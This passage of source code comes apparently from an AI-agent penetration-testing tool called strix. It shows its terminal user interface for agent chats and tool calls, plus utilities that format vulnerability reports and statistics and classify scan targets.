{agent_name_raw}{vuln_indicator}\"\n\n new_node = new_parent.add(\n agent_name,\n data=node_to_copy.data,\n )\n new_node.allow_expand = node_to_copy.allow_expand\n\n self.agent_nodes[agent_id] = new_node\n\n for child in node_to_copy.children:\n self._copy_node_under(child, new_node)\n\n if node_to_copy.is_expanded:\n new_node.expand()\n\n def _reorganize_orphaned_agents(self, new_parent_id: str) -> None:\n agents_to_move = []\n\n for agent_id, agent_data in list(self.tracer.agents.items()):\n if (\n agent_data.get(\"parent_id\") == new_parent_id\n and agent_id in self.agent_nodes\n and agent_id != new_parent_id\n ):\n agents_to_move.append(agent_id)\n\n if not agents_to_move:\n return\n\n parent_node = self.agent_nodes[new_parent_id]\n\n for child_agent_id in agents_to_move:\n if child_agent_id in self.agent_nodes:\n old_node = self.agent_nodes[child_agent_id]\n\n if old_node.parent is parent_node:\n continue\n\n self._copy_node_under(old_node, parent_node)\n\n old_node.remove()\n\n parent_node.allow_expand = True\n parent_node.expand()\n\n def _render_chat_content(self, msg_data: dict[str, Any]) -> Any:\n role = msg_data.get(\"role\")\n content = msg_data.get(\"content\", \"\")\n metadata = msg_data.get(\"metadata\", {})\n\n if not content:\n return None\n\n if role == \"user\":\n return UserMessageRenderer.render_simple(content)\n\n if metadata.get(\"interrupted\"):\n streaming_result = self._render_streaming_content(content)\n interrupted_text = Text()\n interrupted_text.append(\"\\n\")\n interrupted_text.append(\"⚠ \", style=\"yellow\")\n interrupted_text.append(\"Interrupted by user\", style=\"yellow dim\")\n return self._merge_renderables([streaming_result, interrupted_text])\n\n return AgentMessageRenderer.render_simple(content)\n\n def _render_tool_content_simple(self, tool_data: dict[str, Any]) -> Any:\n tool_name = tool_data.get(\"tool_name\", \"Unknown Tool\")\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n result = tool_data.get(\"result\")\n\n renderer = get_tool_renderer(tool_name)\n\n if renderer:\n widget = renderer.render(tool_data)\n return widget.renderable\n\n text = Text()\n\n if tool_name in (\"llm_error_details\", \"sandbox_error_details\"):\n return self._render_error_details(text, tool_name, args)\n\n text.append(\"β†’ Using tool \")\n text.append(tool_name, style=\"bold blue\")\n\n status_styles = {\n \"running\": (\"●\", \"yellow\"),\n \"completed\": (\"βœ“\", \"green\"),\n \"failed\": (\"βœ—\", \"red\"),\n \"error\": (\"βœ—\", \"red\"),\n }\n icon, style = status_styles.get(status, (\"β—‹\", \"dim\"))\n text.append(\" \")\n text.append(icon, style=style)\n\n if args:\n for k, v in list(args.items())[:5]:\n str_v = str(v)\n if len(str_v) > 500:\n str_v = str_v[:497] + \"...\"\n text.append(\"\\n \")\n text.append(k, style=\"dim\")\n text.append(\": \")\n text.append(str_v)\n\n if status in [\"completed\", \"failed\", \"error\"] and result:\n result_str = str(result)\n if len(result_str) > 1000:\n result_str = result_str[:997] + \"...\"\n text.append(\"\\n\")\n text.append(\"Result: \", style=\"bold\")\n text.append(result_str)\n\n return text\n\n def _render_error_details(self, text: Any, tool_name: str, args: dict[str, Any]) -> Any:\n if tool_name == \"llm_error_details\":\n text.append(\"βœ— LLM Request Failed\", style=\"red\")\n else:\n text.append(\"βœ— Sandbox Initialization Failed\", style=\"red\")\n if args.get(\"error\"):\n text.append(f\"\\n{args['error']}\", style=\"bold red\")\n if args.get(\"details\"):\n details = str(args[\"details\"])\n if len(details) > 1000:\n details = details[:997] + \"...\"\n text.append(\"\\nDetails: \", style=\"dim\")\n text.append(details)\n return text\n\n @on(Tree.NodeHighlighted) # type: ignore[misc]\n def handle_tree_highlight(self, event: Tree.NodeHighlighted) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n node = event.node\n\n try:\n agents_tree = self.query_one(\"#agents_tree\", Tree)\n except (ValueError, Exception):\n return\n\n if self.focused == agents_tree and node.data:\n agent_id = node.data.get(\"agent_id\")\n if agent_id:\n self.selected_agent_id = agent_id\n\n @on(Tree.NodeSelected) # type: ignore[misc]\n def handle_tree_node_selected(self, event: Tree.NodeSelected) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n node = event.node\n\n if node.allow_expand:\n if node.is_expanded:\n node.collapse()\n else:\n node.expand()\n\n def _send_user_message(self, message: str) -> None:\n if not self.selected_agent_id:\n return\n\n if self.tracer:\n streaming_content = self.tracer.get_streaming_content(self.selected_agent_id)\n if streaming_content and streaming_content.strip():\n self.tracer.clear_streaming_content(self.selected_agent_id)\n self.tracer.interrupted_content[self.selected_agent_id] = streaming_content\n self.tracer.log_chat_message(\n content=streaming_content,\n role=\"assistant\",\n agent_id=self.selected_agent_id,\n metadata={\"interrupted\": True},\n )\n\n try:\n from strix.tools.agents_graph.agents_graph_actions import _agent_instances\n\n if self.selected_agent_id in _agent_instances:\n agent_instance = _agent_instances[self.selected_agent_id]\n if hasattr(agent_instance, \"cancel_current_execution\"):\n agent_instance.cancel_current_execution()\n except (ImportError, AttributeError, KeyError):\n pass\n\n if self.tracer:\n self.tracer.log_chat_message(\n content=message,\n role=\"user\",\n agent_id=self.selected_agent_id,\n )\n\n try:\n from strix.tools.agents_graph.agents_graph_actions import send_user_message_to_agent\n\n send_user_message_to_agent(self.selected_agent_id, message)\n\n except (ImportError, AttributeError) as e:\n import logging\n\n logging.warning(f\"Failed to send message to agent {self.selected_agent_id}: {e}\")\n\n self._displayed_events.clear()\n self._update_chat_view()\n\n self.call_after_refresh(self._focus_chat_input)\n\n def _get_agent_name(self, agent_id: str) -> str:\n try:\n if self.tracer and agent_id in self.tracer.agents:\n agent_name = self.tracer.agents[agent_id].get(\"name\")\n if isinstance(agent_name, str):\n return agent_name\n except (KeyError, AttributeError) as e:\n logging.warning(f\"Could not retrieve agent name for {agent_id}: {e}\")\n return \"Unknown Agent\"\n\n def action_toggle_help(self) -> None:\n if self.show_splash or not self.is_mounted:\n return\n\n try:\n self.query_one(\"#main_container\")\n except (ValueError, Exception):\n return\n\n if isinstance(self.screen, HelpScreen):\n self.pop_screen()\n return\n\n if len(self.screen_stack) > 1:\n return\n\n self.push_screen(HelpScreen())\n\n def action_request_quit(self) -> None:\n if self.show_splash or not self.is_mounted:\n self.action_custom_quit()\n return\n\n if len(self.screen_stack) > 1:\n return\n\n try:\n self.query_one(\"#main_container\")\n except (ValueError, Exception):\n self.action_custom_quit()\n return\n\n self.push_screen(QuitScreen())\n\n def action_stop_selected_agent(self) -> None:\n if self.show_splash or not self.is_mounted:\n return\n\n if len(self.screen_stack) > 1:\n self.pop_screen()\n return\n\n if not self.selected_agent_id:\n return\n\n agent_name, should_stop = self._validate_agent_for_stopping()\n if not should_stop:\n return\n\n try:\n self.query_one(\"#main_container\")\n except (ValueError, Exception):\n return\n\n self.push_screen(StopAgentScreen(agent_name, self.selected_agent_id))\n\n def _validate_agent_for_stopping(self) -> tuple[str, bool]:\n agent_name = \"Unknown Agent\"\n\n try:\n if self.tracer and self.selected_agent_id in self.tracer.agents:\n agent_data = self.tracer.agents[self.selected_agent_id]\n agent_name = agent_data.get(\"name\", \"Unknown Agent\")\n\n agent_status = agent_data.get(\"status\", \"running\")\n if agent_status not in [\"running\"]:\n return agent_name, False\n\n agent_events = self._gather_agent_events(self.selected_agent_id)\n if not agent_events:\n return agent_name, False\n\n return agent_name, True\n\n except (KeyError, AttributeError, ValueError) as e:\n import logging\n\n logging.warning(f\"Failed to gather agent events: {e}\")\n\n return agent_name, False\n\n def action_confirm_stop_agent(self, agent_id: str) -> None:\n try:\n from strix.tools.agents_graph.agents_graph_actions import stop_agent\n\n result = stop_agent(agent_id)\n\n import logging\n\n if result.get(\"success\"):\n logging.info(f\"Stop request sent to agent: {result.get('message', 'Unknown')}\")\n else:\n logging.warning(f\"Failed to stop agent: {result.get('error', 'Unknown error')}\")\n\n except Exception:\n import logging\n\n logging.exception(f\"Failed to stop agent {agent_id}\")\n\n def action_custom_quit(self) -> None:\n if self._scan_thread and self._scan_thread.is_alive():\n self._scan_stop_event.set()\n\n self._scan_thread.join(timeout=1.0)\n\n self.tracer.cleanup()\n\n self.exit()\n\n def _is_widget_safe(self, widget: Any) -> bool:\n try:\n _ = widget.screen\n except (AttributeError, ValueError, Exception):\n return False\n else:\n return bool(widget.is_mounted)\n\n def _safe_widget_operation(\n self, operation: Callable[..., Any], *args: Any, **kwargs: Any\n ) -> bool:\n try:\n operation(*args, **kwargs)\n except (AttributeError, ValueError, Exception):\n return False\n else:\n return True\n\n def on_resize(self, event: events.Resize) -> None:\n if self.show_splash or not self.is_mounted:\n return\n\n try:\n sidebar = self.query_one(\"#sidebar\", Vertical)\n chat_area = self.query_one(\"#chat_area_container\", Vertical)\n except (ValueError, Exception):\n return\n\n if event.size.width < self.SIDEBAR_MIN_WIDTH:\n sidebar.add_class(\"-hidden\")\n chat_area.add_class(\"-full-width\")\n else:\n sidebar.remove_class(\"-hidden\")\n chat_area.remove_class(\"-full-width\")\n\n def on_mouse_up(self, _event: events.MouseUp) -> None:\n self.set_timer(0.05, self._auto_copy_selection)\n\n _ICON_PREFIXES: ClassVar[tuple[str, ...]] = (\n \"🐞 \",\n \"🌐 \",\n \"πŸ“‹ \",\n \"🧠 \",\n \"β—† \",\n \"β—‡ \",\n \"β—ˆ \",\n \"β†’ \",\n \"β—‹ \",\n \"● \",\n \"βœ“ \",\n \"βœ— \",\n \"⚠ \",\n \"▍ \",\n \"▍\",\n \"┃ \",\n \"β€’ \",\n \">_ \",\n \" \",\n \"<~> \",\n \"[ ] \",\n \"[~] \",\n \"[β€’] \",\n )\n\n _DECORATIVE_LINES: ClassVar[frozenset[str]] = frozenset(\n {\n \"● In progress...\",\n \"βœ“ Done\",\n \"βœ— Failed\",\n \"βœ— Error\",\n \"β—‹ Unknown\",\n }\n )\n\n @staticmethod\n def _clean_copied_text(text: str) -> str:\n lines = text.split(\"\\n\")\n cleaned: list[str] = []\n for line in lines:\n stripped = line.lstrip()\n if stripped in StrixTUIApp._DECORATIVE_LINES:\n continue\n if stripped and all(c == \"─\" for c in stripped):\n continue\n out = line\n for prefix in StrixTUIApp._ICON_PREFIXES:\n if stripped.startswith(prefix):\n leading = line[: len(line) - len(line.lstrip())]\n out = leading + stripped[len(prefix) :]\n break\n cleaned.append(out)\n return \"\\n\".join(cleaned)\n\n def _auto_copy_selection(self) -> None:\n copied = False\n\n try:\n if self.screen.selections:\n selected = self.screen.get_selected_text()\n self.screen.clear_selection()\n if selected and selected.strip():\n cleaned = self._clean_copied_text(selected)\n self.copy_to_clipboard(cleaned if cleaned.strip() else selected)\n copied = True\n except Exception: # noqa: BLE001\n logger.debug(\"Failed to copy screen selection\", exc_info=True)\n\n if not copied:\n try:\n chat_input = self.query_one(\"#chat_input\", ChatTextArea)\n selected = chat_input.selected_text\n if selected and selected.strip():\n self.copy_to_clipboard(selected)\n chat_input.move_cursor(chat_input.cursor_location)\n copied = True\n except Exception: # noqa: BLE001\n logger.debug(\"Failed to copy chat input selection\", exc_info=True)\n\n if copied:\n self.notify(\"Copied to clipboard\", timeout=2)\n\n\nasync def run_tui(args: argparse.Namespace) -> None:\n \"\"\"Run strix in interactive TUI mode with textual.\"\"\"\n app = StrixTUIApp(args)\n await app.run_async()\n" }, { "path": "strix/interface/utils.py", "content": "import ipaddress\nimport json\nimport re\nimport secrets\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom pathlib import Path\nfrom typing import Any\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlparse\nfrom urllib.request import Request, urlopen\n\nimport docker\nfrom docker.errors import DockerException, ImageNotFound\nfrom rich.console import Console\nfrom rich.panel import Panel\nfrom rich.text import Text\n\n\n# Token formatting utilities\ndef format_token_count(count: float) -> str:\n count = int(count)\n if count >= 1_000_000:\n return f\"{count / 1_000_000:.1f}M\"\n if count >= 1_000:\n return f\"{count / 1_000:.1f}K\"\n return str(count)\n\n\n# Display utilities\ndef get_severity_color(severity: str) -> str:\n severity_colors = {\n \"critical\": \"#dc2626\",\n \"high\": \"#ea580c\",\n \"medium\": \"#d97706\",\n \"low\": \"#65a30d\",\n \"info\": \"#0284c7\",\n }\n return severity_colors.get(severity, \"#6b7280\")\n\n\ndef get_cvss_color(cvss_score: float) -> str:\n if cvss_score >= 9.0:\n return \"#dc2626\"\n if cvss_score >= 7.0:\n return \"#ea580c\"\n if cvss_score >= 4.0:\n return \"#d97706\"\n if cvss_score >= 0.1:\n return \"#65a30d\"\n return \"#6b7280\"\n\n\ndef format_vulnerability_report(report: dict[str, Any]) -> Text: # noqa: PLR0912, PLR0915\n \"\"\"Format a vulnerability report for CLI display with all rich fields.\"\"\"\n field_style = \"bold #4ade80\"\n\n text = Text()\n\n title = report.get(\"title\", \"\")\n if title:\n text.append(\"Vulnerability Report\", style=\"bold #ea580c\")\n text.append(\"\\n\\n\")\n text.append(\"Title: \", style=field_style)\n text.append(title)\n\n severity = report.get(\"severity\", \"\")\n if severity:\n text.append(\"\\n\\n\")\n text.append(\"Severity: \", style=field_style)\n severity_color = get_severity_color(severity.lower())\n text.append(severity.upper(), style=f\"bold {severity_color}\")\n\n cvss = report.get(\"cvss\")\n if cvss is not None:\n text.append(\"\\n\\n\")\n text.append(\"CVSS Score: \", style=field_style)\n cvss_color = get_cvss_color(cvss)\n text.append(f\"{cvss:.1f}\", style=f\"bold {cvss_color}\")\n\n target = report.get(\"target\")\n if target:\n text.append(\"\\n\\n\")\n text.append(\"Target: \", style=field_style)\n text.append(target)\n\n endpoint = report.get(\"endpoint\")\n if endpoint:\n text.append(\"\\n\\n\")\n text.append(\"Endpoint: \", style=field_style)\n text.append(endpoint)\n\n method = report.get(\"method\")\n if method:\n text.append(\"\\n\\n\")\n text.append(\"Method: \", style=field_style)\n text.append(method)\n\n cve = report.get(\"cve\")\n if cve:\n text.append(\"\\n\\n\")\n text.append(\"CVE: \", style=field_style)\n text.append(cve)\n\n cvss_breakdown = report.get(\"cvss_breakdown\", {})\n if cvss_breakdown:\n text.append(\"\\n\\n\")\n cvss_parts = []\n if cvss_breakdown.get(\"attack_vector\"):\n cvss_parts.append(f\"AV:{cvss_breakdown['attack_vector']}\")\n if cvss_breakdown.get(\"attack_complexity\"):\n cvss_parts.append(f\"AC:{cvss_breakdown['attack_complexity']}\")\n if cvss_breakdown.get(\"privileges_required\"):\n cvss_parts.append(f\"PR:{cvss_breakdown['privileges_required']}\")\n if cvss_breakdown.get(\"user_interaction\"):\n cvss_parts.append(f\"UI:{cvss_breakdown['user_interaction']}\")\n if cvss_breakdown.get(\"scope\"):\n cvss_parts.append(f\"S:{cvss_breakdown['scope']}\")\n if cvss_breakdown.get(\"confidentiality\"):\n cvss_parts.append(f\"C:{cvss_breakdown['confidentiality']}\")\n if cvss_breakdown.get(\"integrity\"):\n cvss_parts.append(f\"I:{cvss_breakdown['integrity']}\")\n if cvss_breakdown.get(\"availability\"):\n cvss_parts.append(f\"A:{cvss_breakdown['availability']}\")\n if cvss_parts:\n text.append(\"CVSS Vector: \", style=field_style)\n text.append(\"/\".join(cvss_parts), style=\"dim\")\n\n description = report.get(\"description\")\n if description:\n text.append(\"\\n\\n\")\n text.append(\"Description\", style=field_style)\n text.append(\"\\n\")\n text.append(description)\n\n impact = report.get(\"impact\")\n if impact:\n text.append(\"\\n\\n\")\n text.append(\"Impact\", style=field_style)\n text.append(\"\\n\")\n text.append(impact)\n\n technical_analysis = report.get(\"technical_analysis\")\n if technical_analysis:\n text.append(\"\\n\\n\")\n text.append(\"Technical Analysis\", style=field_style)\n text.append(\"\\n\")\n text.append(technical_analysis)\n\n poc_description = report.get(\"poc_description\")\n if poc_description:\n text.append(\"\\n\\n\")\n text.append(\"PoC Description\", style=field_style)\n text.append(\"\\n\")\n text.append(poc_description)\n\n poc_script_code = report.get(\"poc_script_code\")\n if poc_script_code:\n text.append(\"\\n\\n\")\n text.append(\"PoC Code\", style=field_style)\n text.append(\"\\n\")\n text.append(poc_script_code, style=\"dim\")\n\n code_locations = report.get(\"code_locations\")\n if code_locations:\n text.append(\"\\n\\n\")\n text.append(\"Code Locations\", style=field_style)\n for i, loc in enumerate(code_locations):\n text.append(\"\\n\\n\")\n text.append(f\" Location {i + 1}: \", style=\"dim\")\n text.append(loc.get(\"file\", \"unknown\"), style=\"bold\")\n start = loc.get(\"start_line\")\n end = loc.get(\"end_line\")\n if start is not None:\n if end and end != start:\n text.append(f\":{start}-{end}\")\n else:\n text.append(f\":{start}\")\n if loc.get(\"label\"):\n text.append(f\"\\n {loc['label']}\", style=\"italic dim\")\n if loc.get(\"snippet\"):\n text.append(\"\\n \")\n text.append(loc[\"snippet\"], style=\"dim\")\n if loc.get(\"fix_before\") or loc.get(\"fix_after\"):\n text.append(\"\\n Fix:\")\n if loc.get(\"fix_before\"):\n text.append(\"\\n - \", style=\"dim\")\n text.append(loc[\"fix_before\"], style=\"dim\")\n if loc.get(\"fix_after\"):\n text.append(\"\\n + \", style=\"dim\")\n text.append(loc[\"fix_after\"], style=\"dim\")\n\n remediation_steps = report.get(\"remediation_steps\")\n if remediation_steps:\n text.append(\"\\n\\n\")\n text.append(\"Remediation\", style=field_style)\n text.append(\"\\n\")\n text.append(remediation_steps)\n\n return text\n\n\ndef _build_vulnerability_stats(stats_text: Text, tracer: Any) -> None:\n \"\"\"Build vulnerability section of stats text.\"\"\"\n vuln_count = len(tracer.vulnerability_reports)\n\n if vuln_count > 0:\n severity_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"info\": 0}\n for report in tracer.vulnerability_reports:\n severity = report.get(\"severity\", \"\").lower()\n if severity in severity_counts:\n severity_counts[severity] += 1\n\n stats_text.append(\"Vulnerabilities \", style=\"bold red\")\n\n severity_parts = []\n for severity in [\"critical\", \"high\", \"medium\", \"low\", \"info\"]:\n count = severity_counts[severity]\n if count > 0:\n severity_color = get_severity_color(severity)\n severity_text = Text()\n severity_text.append(f\"{severity.upper()}: \", style=severity_color)\n severity_text.append(str(count), style=f\"bold {severity_color}\")\n severity_parts.append(severity_text)\n\n for i, part in enumerate(severity_parts):\n stats_text.append(part)\n if i < len(severity_parts) - 1:\n stats_text.append(\" | \", style=\"dim white\")\n\n stats_text.append(\" (Total: \", style=\"dim white\")\n stats_text.append(str(vuln_count), style=\"bold yellow\")\n stats_text.append(\")\", style=\"dim white\")\n stats_text.append(\"\\n\")\n else:\n stats_text.append(\"Vulnerabilities \", style=\"bold #22c55e\")\n stats_text.append(\"0\", style=\"bold white\")\n stats_text.append(\" (No exploitable vulnerabilities detected)\", style=\"dim green\")\n stats_text.append(\"\\n\")\n\n\ndef _build_llm_stats(stats_text: Text, total_stats: dict[str, Any]) -> None:\n \"\"\"Build LLM usage section of stats text.\"\"\"\n if total_stats[\"requests\"] > 0:\n stats_text.append(\"\\n\")\n stats_text.append(\"Input Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"input_tokens\"]), style=\"white\")\n\n if total_stats[\"cached_tokens\"] > 0:\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Cached Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"cached_tokens\"]), style=\"white\")\n\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Output Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"output_tokens\"]), style=\"white\")\n\n if total_stats[\"cost\"] > 0:\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Cost \", style=\"dim\")\n stats_text.append(f\"${total_stats['cost']:.4f}\", style=\"bold #fbbf24\")\n else:\n stats_text.append(\"\\n\")\n stats_text.append(\"Cost \", style=\"dim\")\n stats_text.append(\"$0.0000 \", style=\"#fbbf24\")\n stats_text.append(\"Β· \", style=\"dim white\")\n stats_text.append(\"Tokens \", style=\"dim\")\n stats_text.append(\"0\", style=\"white\")\n\n\ndef build_final_stats_text(tracer: Any) -> Text:\n \"\"\"Build stats text for final output with detailed messages and LLM usage.\"\"\"\n stats_text = Text()\n if not tracer:\n return stats_text\n\n _build_vulnerability_stats(stats_text, tracer)\n\n tool_count = tracer.get_real_tool_count()\n agent_count = len(tracer.agents)\n\n stats_text.append(\"Agents\", style=\"dim\")\n stats_text.append(\" \")\n stats_text.append(str(agent_count), style=\"bold white\")\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Tools\", style=\"dim\")\n stats_text.append(\" \")\n stats_text.append(str(tool_count), style=\"bold white\")\n\n llm_stats = tracer.get_total_llm_stats()\n _build_llm_stats(stats_text, llm_stats[\"total\"])\n\n return stats_text\n\n\ndef build_live_stats_text(tracer: Any, agent_config: dict[str, Any] | None = None) -> Text:\n stats_text = Text()\n if not tracer:\n return stats_text\n\n if agent_config:\n llm_config = agent_config[\"llm_config\"]\n model = getattr(llm_config, \"model_name\", \"Unknown\")\n stats_text.append(\"Model \", style=\"dim\")\n stats_text.append(model, style=\"white\")\n stats_text.append(\"\\n\")\n\n vuln_count = len(tracer.vulnerability_reports)\n tool_count = tracer.get_real_tool_count()\n agent_count = len(tracer.agents)\n\n stats_text.append(\"Vulnerabilities \", style=\"dim\")\n stats_text.append(f\"{vuln_count}\", style=\"white\")\n stats_text.append(\"\\n\")\n if vuln_count > 0:\n severity_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"info\": 0}\n for report in tracer.vulnerability_reports:\n severity = report.get(\"severity\", \"\").lower()\n if severity in severity_counts:\n severity_counts[severity] += 1\n\n severity_parts = []\n for severity in [\"critical\", \"high\", \"medium\", \"low\", \"info\"]:\n count = severity_counts[severity]\n if count > 0:\n severity_color = get_severity_color(severity)\n severity_text = Text()\n severity_text.append(f\"{severity.upper()}: \", style=severity_color)\n severity_text.append(str(count), style=f\"bold {severity_color}\")\n severity_parts.append(severity_text)\n\n for i, part in enumerate(severity_parts):\n stats_text.append(part)\n if i < len(severity_parts) - 1:\n stats_text.append(\" | \", style=\"dim white\")\n\n stats_text.append(\"\\n\")\n\n stats_text.append(\"Agents \", style=\"dim\")\n stats_text.append(str(agent_count), style=\"white\")\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Tools \", style=\"dim\")\n stats_text.append(str(tool_count), style=\"white\")\n\n llm_stats = tracer.get_total_llm_stats()\n total_stats = llm_stats[\"total\"]\n\n stats_text.append(\"\\n\")\n\n stats_text.append(\"Input Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"input_tokens\"]), style=\"white\")\n\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Cached Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"cached_tokens\"]), style=\"white\")\n\n stats_text.append(\"\\n\")\n\n stats_text.append(\"Output Tokens \", style=\"dim\")\n stats_text.append(format_token_count(total_stats[\"output_tokens\"]), style=\"white\")\n\n stats_text.append(\" Β· \", style=\"dim white\")\n stats_text.append(\"Cost \", style=\"dim\")\n stats_text.append(f\"${total_stats['cost']:.4f}\", style=\"#fbbf24\")\n\n return stats_text\n\n\ndef build_tui_stats_text(tracer: Any, agent_config: dict[str, Any] | None = None) -> Text:\n stats_text = Text()\n if not tracer:\n return stats_text\n\n if agent_config:\n llm_config = agent_config[\"llm_config\"]\n model = getattr(llm_config, \"model_name\", \"Unknown\")\n stats_text.append(model, style=\"white\")\n\n llm_stats = tracer.get_total_llm_stats()\n total_stats = llm_stats[\"total\"]\n\n total_tokens = total_stats[\"input_tokens\"] + total_stats[\"output_tokens\"]\n if total_tokens > 0:\n stats_text.append(\"\\n\")\n stats_text.append(f\"{format_token_count(total_tokens)} tokens\", style=\"white\")\n\n if total_stats[\"cost\"] > 0:\n stats_text.append(\" Β· \", style=\"white\")\n stats_text.append(f\"${total_stats['cost']:.2f}\", style=\"white\")\n\n caido_url = getattr(tracer, \"caido_url\", None)\n if caido_url:\n stats_text.append(\"\\n\")\n stats_text.append(\"Caido: \", style=\"bold white\")\n stats_text.append(caido_url, style=\"white\")\n\n return stats_text\n\n\n# Name generation utilities\n\n\ndef _slugify_for_run_name(text: str, max_length: int = 32) -> str:\n text = text.lower().strip()\n text = re.sub(r\"[^a-z0-9]+\", \"-\", text)\n text = text.strip(\"-\")\n if len(text) > max_length:\n text = text[:max_length].rstrip(\"-\")\n return text or \"pentest\"\n\n\ndef _derive_target_label_for_run_name(targets_info: list[dict[str, Any]] | None) -> str: # noqa: PLR0911\n if not targets_info:\n return \"pentest\"\n\n first = targets_info[0]\n target_type = first.get(\"type\")\n details = first.get(\"details\", {}) or {}\n original = first.get(\"original\", \"\") or \"\"\n\n if target_type == \"web_application\":\n url = details.get(\"target_url\", original)\n try:\n parsed = urlparse(url)\n return str(parsed.netloc or parsed.path or url)\n except Exception: # noqa: BLE001\n return str(url)\n\n if target_type == \"repository\":\n repo = details.get(\"target_repo\", original)\n parsed = urlparse(repo)\n path = parsed.path or repo\n name = path.rstrip(\"/\").split(\"/\")[-1] or path\n if name.endswith(\".git\"):\n name = name[:-4]\n return str(name)\n\n if target_type == \"local_code\":\n path_str = details.get(\"target_path\", original)\n try:\n return str(Path(path_str).name or path_str)\n except Exception: # noqa: BLE001\n return str(path_str)\n\n if target_type == \"ip_address\":\n return str(details.get(\"target_ip\", original) or original)\n\n return str(original or \"pentest\")\n\n\ndef generate_run_name(targets_info: list[dict[str, Any]] | None = None) -> str:\n base_label = _derive_target_label_for_run_name(targets_info)\n slug = _slugify_for_run_name(base_label)\n\n random_suffix = secrets.token_hex(2)\n\n return f\"{slug}_{random_suffix}\"\n\n\n# Target processing utilities\n\n\ndef _is_http_git_repo(url: str) -> bool:\n check_url = f\"{url.rstrip('/')}/info/refs?service=git-upload-pack\"\n try:\n req = Request(check_url, headers={\"User-Agent\": \"git/strix\"}) # noqa: S310\n with urlopen(req, timeout=10) as resp: # noqa: S310 # nosec B310\n return \"x-git-upload-pack-advertisement\" in resp.headers.get(\"Content-Type\", \"\")\n except HTTPError as e:\n return e.code == 401\n except (URLError, OSError, ValueError):\n return False\n\n\ndef infer_target_type(target: str) -> tuple[str, dict[str, str]]: # noqa: PLR0911, PLR0912\n if not target or not isinstance(target, str):\n raise ValueError(\"Target must be a non-empty string\")\n\n target = target.strip()\n\n if target.startswith(\"git@\"):\n return \"repository\", {\"target_repo\": target}\n\n if target.startswith(\"git://\"):\n return \"repository\", {\"target_repo\": target}\n\n parsed = urlparse(target)\n if parsed.scheme in (\"http\", \"https\"):\n if parsed.username or parsed.password:\n return \"repository\", {\"target_repo\": target}\n if parsed.path.rstrip(\"/\").endswith(\".git\"):\n return \"repository\", {\"target_repo\": target}\n if parsed.query or parsed.fragment:\n return \"web_application\", {\"target_url\": target}\n path_segments = [s for s in parsed.path.split(\"/\") if s]\n if len(path_segments) >= 2 and _is_http_git_repo(target):\n return \"repository\", {\"target_repo\": target}\n return \"web_application\", {\"target_url\": target}\n\n try:\n ip_obj = ipaddress.ip_address(target)\n except ValueError:\n pass\n else:\n return \"ip_address\", {\"target_ip\": str(ip_obj)}\n\n path = Path(target).expanduser()\n try:\n if path.exists():\n if path.is_dir():\n return \"local_code\", {\"target_path\": str(path.resolve())}\n raise ValueError(f\"Path exists but is not a directory: {target}\")\n except (OSError, RuntimeError) as e:\n raise ValueError(f\"Invalid path: {target} - {e!s}\") from e\n\n if target.endswith(\".git\"):\n return \"repository\", {\"target_repo\": target}\n\n if \"/\" in target:\n host_part, _, path_part = target.partition(\"/\")\n if \".\" in host_part and not host_part.startswith(\".\") and path_part:\n full_url = f\"https://{target}\"\n if _is_http_git_repo(full_url):\n return \"repository\", {\"target_repo\": full_url}\n return \"web_application\", {\"target_url\": full_url}\n\n if \".\" in target and \"/\" not in target and not target.startswith(\".\"):\n parts = target.split(\".\")\n if len(parts) >= 2 and all(p and p.strip() for p in parts):\n return \"web_application\", {\"target_url\": f\"https://{target}\"}\n\n raise ValueError(\n f\"Invalid target: {target}\\n\"\n \"Target must be one of:\\n\"\n \"- A valid URL (http:// or https://)\\n\"\n \"- A Git repository URL (https://host/org/repo or git@host:org/repo.git)\\n\"\n \"- A local directory path\\n\"\n \"- A domain name (e.g., example.com)\\n\"\n \"- An IP address (e.g., 192.168.1.10)\"\n )\n\n\ndef sanitize_name(name: str) -> str:\n sanitized = re.sub(r\"[^A-Za-z0-9._-]\", \"-\", name.strip())\n return sanitized or \"target\"\n\n\ndef derive_repo_base_name(repo_url: str) -> str:\n if repo_url.endswith(\"/\"):\n repo_url = repo_url[:-1]\n\n if \":\" in repo_url and repo_url.startswith(\"git@\"):\n path_part = repo_url.split(\":\", 1)[1]\n else:\n path_part = urlparse(repo_url).path or repo_url\n\n candidate = path_part.split(\"/\")[-1]\n if candidate.endswith(\".git\"):\n candidate = candidate[:-4]\n\n return sanitize_name(candidate or \"repository\")\n\n\ndef derive_local_base_name(path_str: str) -> str:\n try:\n base = Path(path_str).resolve().name\n except (OSError, RuntimeError):\n base = Path(path_str).name\n return sanitize_name(base or \"workspace\")\n\n\ndef assign_workspace_subdirs(targets_info: list[dict[str, Any]]) -> None:\n name_counts: dict[str, int] = {}\n\n for target in targets_info:\n target_type = target[\"type\"]\n details = target[\"details\"]\n\n base_name: str | None = None\n if target_type == \"repository\":\n base_name = derive_repo_base_name(details[\"target_repo\"])\n elif target_type == \"local_code\":\n base_name = derive_local_base_name(details.get(\"target_path\", \"local\"))\n\n if base_name is None:\n continue\n\n count = name_counts.get(base_name, 0) + 1\n name_counts[base_name] = count\n\n workspace_subdir = base_name if count == 1 else f\"{base_name}-{count}\"\n\n details[\"workspace_subdir\"] = workspace_subdir\n\n\ndef collect_local_sources(targets_info: list[dict[str, Any]]) -> list[dict[str, str]]:\n local_sources: list[dict[str, str]] = []\n\n for target_info in targets_info:\n 